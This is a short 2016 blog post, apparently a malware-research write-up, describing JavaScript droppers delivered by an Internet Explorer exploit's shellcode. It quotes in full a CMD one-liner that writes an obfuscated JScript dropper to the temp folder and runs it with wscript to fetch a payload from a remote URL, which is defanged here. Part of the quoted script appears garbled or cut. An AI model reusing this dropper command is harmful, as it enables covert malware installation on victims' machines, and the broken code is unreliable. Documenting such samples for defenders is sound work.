Monday, September 26, 2016

Oh look – JavaScript Droppers

In a typical drive-by-download attack scenario the shellcode would download and execute a malware binary. The malware binary is usually wrapped in a dropper that unpacks or de-obfuscates and executes it. Droppers’ main goal is to launch malware without being detected by antiviruses and HIPS. Nowadays the most popular way of covert launching would probably be process hallowing. Recently we found a couple of curious specimen that does not follow this fashion. These cases are not new, but we thought they’re worth mentioning because we’ve been seeing quite a few of those lately.

One of them is the shellcode from an Internet Explorer exploit, which instead of downloading a binary executes the following CMD command:

 Windows/syswow64/cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo var w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var n=h(m(2),m(1),m(0));if (n.indexOf(o)^>3){k=n.split(o);l=k[1].split(";");for (var i=0;i^b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&255,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^wtm.js && start wscript //B wtm.js "y0fz0r5qF2MT" "hxxp://" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 

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